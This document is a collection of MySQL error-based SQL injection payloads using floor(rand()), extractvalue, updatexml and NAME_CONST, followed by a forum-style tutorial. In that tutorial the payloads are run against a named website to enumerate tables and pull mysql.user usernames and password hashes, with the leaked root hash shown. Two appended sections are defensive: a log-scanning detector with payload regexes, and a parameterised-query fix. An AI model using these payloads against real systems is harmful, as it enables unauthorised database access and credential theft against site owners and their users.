1. Error-based injection via floor()

The following payloads can be used:

  and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
  and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example. First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To read other data, replace version() with the desired subquery. For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

  and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

  and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
Further collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
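A defender-side check for the techniques collected above, added here as an example and not part of the original post. It scans web-server access-log lines for the four error-based signatures shown so far (floor(rand()) combined with GROUP BY, extractvalue(), updatexml(), and a doubled NAME_CONST() inside one derived table) and scans application-log lines for the database error strings these techniques depend on being echoed to the client. All log lines below are constructed for the example; the /content/detail.php path and the version string are taken from the post, nothing else is real.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed access-log lines (combined log format). Lines 2-5 carry the
# payloads from the post, URL-encoded the way a browser or tool would send them.
ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /content/detail.php?id=330+and+1%3D(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 412',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))-- HTTP/1.1" 500 398',
    '10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 431',
    '10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /content/detail.php?id=1%20and%201%3D(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 377',
]

# Constructed application-log lines: two leak raw MySQL errors, one is benign.
APP_LOG = [
    "2024-01-01 12:00:02 detail.php: ERROR 1062 (23000): Duplicate entry '5.0.27-community-nt1' for key 'group_key'",
    "2024-01-01 12:00:03 detail.php: ERROR 1105 (HY000): XPATH syntax error: '\\root@localhost'",
    "2024-01-01 12:00:06 detail.php: article 330 rendered in 12ms",
]

# Request-side signatures, matched against each decoded query parameter.
PAYLOAD_RULES = {
    "floor-rand-groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    # Two NAME_CONST() calls in one derived table is what forces the
    # "Duplicate column name" error; a single call is ordinary SQL.
    "name_const-dup-column": re.compile(r"name_const\s*\(.*name_const\s*\(", re.I | re.S),
}

# Response/application-side signatures: the error text that should never
# reach a client. Seeing these in logs means errors are being displayed.
ERROR_RULES = {
    "leaked-duplicate-entry": re.compile(r"ERROR 1062 .*Duplicate entry"),
    "leaked-xpath-error": re.compile(r"XPATH syntax error"),
    "leaked-duplicate-column": re.compile(r"Duplicate column name"),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(value):
    """Decode once more (catches double encoding), drop inline comments,
    and fold whitespace so the regexes see one canonical form."""
    decoded = unquote_plus(unquote_plus(value))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded)


def scan_request(line):
    """Return [(rule, parameter_name), ...] for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        text = normalize(value)
        for rule, pattern in PAYLOAD_RULES.items():
            if pattern.search(text):
                findings.append((rule, name))
    return findings


def scan_errors(line):
    """Return the names of leaked-error rules that fire on one app-log line."""
    return [rule for rule, pattern in ERROR_RULES.items() if pattern.search(line)]


def summarize(access_log, app_log):
    """Counts a SOC analyst would put on a dashboard for this host."""
    return {
        "flagged_requests": sum(1 for line in access_log if scan_request(line)),
        "leaked_errors": sum(1 for line in app_log if scan_errors(line)),
    }


if __name__ == "__main__":
    for line in ACCESS_LOG:
        print(scan_request(line))
    for line in APP_LOG:
        print(scan_errors(line))
    print(summarize(ACCESS_LOG, APP_LOG))
```

Two design points: the request rules are deliberately narrow (a function name followed by an opening parenthesis, or the doubled NAME_CONST shape) so that ordinary text containing the word "floor" is not flagged, and the error rules are the more reliable signal, because a leaked ERROR 1062 or XPATH message proves both that the parameter was injectable and that the application displays database errors.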
Error-based injection on newer MySQL versions: using NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading..
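The root-cause fix for everything in this post, as an added example that is not part of the original post or the quoted NAME_CONST tutorial. Every technique above needs two things from the application: a numeric id pasted straight into `select * from article where id = ...`, and the raw database error echoed back to the browser. The example below (Python, with the standard-library sqlite3 module standing in for MySQL; the article table and its single row are constructed from the one shown at the top of the post) puts the vulnerable handler next to the hardened one: a strict allow-list on the id, parameter binding, and a generic error response with the real error kept in a server-side log. PROBE is a constructed, harmless input that only demonstrates how an error message leaks.

```python
import re
import sqlite3

# Constructed sample database modelled on the article table in the post.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text, content text)")
    conn.execute("insert into article values (1, 'test', 'do it')")
    conn.commit()
    return conn


# Constructed input: valid SQL that references a table which does not exist,
# so the only effect is a database error, which is all this example needs.
PROBE = "1 and 1=(select count(*) from no_such_table)"

SERVER_LOG = []  # where the hardened handler keeps the real error for operators


# --- vulnerable pattern --------------------------------------------------

def lookup_unsafe(conn, raw_id):
    # The request parameter is concatenated into the statement, so anything
    # after the number is executed as SQL.
    sql = "select id, title, content from article where id = " + raw_id
    return conn.execute(sql).fetchall()


def render_unsafe(conn, raw_id):
    # Mirrors an application that prints the database error to the page;
    # error-based extraction relies on exactly this behaviour.
    try:
        rows = lookup_unsafe(conn, raw_id)
    except sqlite3.Error as exc:
        return 500, "Database error: %s" % exc
    return (200, rows) if rows else (404, "not found")


# --- hardened pattern ----------------------------------------------------

ID_RE = re.compile(r"^[1-9][0-9]{0,9}$")


def parse_id(raw_id):
    """Allow-list validation: a positive integer of at most 10 digits,
    rejected before the value gets anywhere near the database."""
    value = raw_id.strip()
    if not ID_RE.fullmatch(value):
        raise ValueError("invalid article id")
    return int(value)


def lookup_safe(conn, article_id):
    # Parameter binding: the driver sends the value separately from the SQL
    # text, so it can never change the structure of the statement.
    sql = "select id, title, content from article where id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


def render_safe(conn, raw_id):
    try:
        article_id = parse_id(raw_id)
    except ValueError:
        return 400, "invalid request"
    try:
        rows = lookup_safe(conn, article_id)
    except sqlite3.Error as exc:
        # Keep the detail for operators; give the client nothing to read.
        SERVER_LOG.append("article lookup failed: %s" % exc)
        return 500, "internal error"
    return (200, rows) if rows else (404, "not found")


if __name__ == "__main__":
    db = make_db()
    print(render_unsafe(db, "1"), render_unsafe(db, PROBE))
    print(render_safe(db, "1"), render_safe(db, PROBE))
```

The validation step and the parameter binding are independent defences: binding alone already prevents the injection, and the allow-list is what turns a malformed id into a clean 400 instead of a database round-trip. The generic error response matters even with both in place, because any future query that does fail (schema change, outage) would otherwise hand an attacker the same kind of oracle the post is built on.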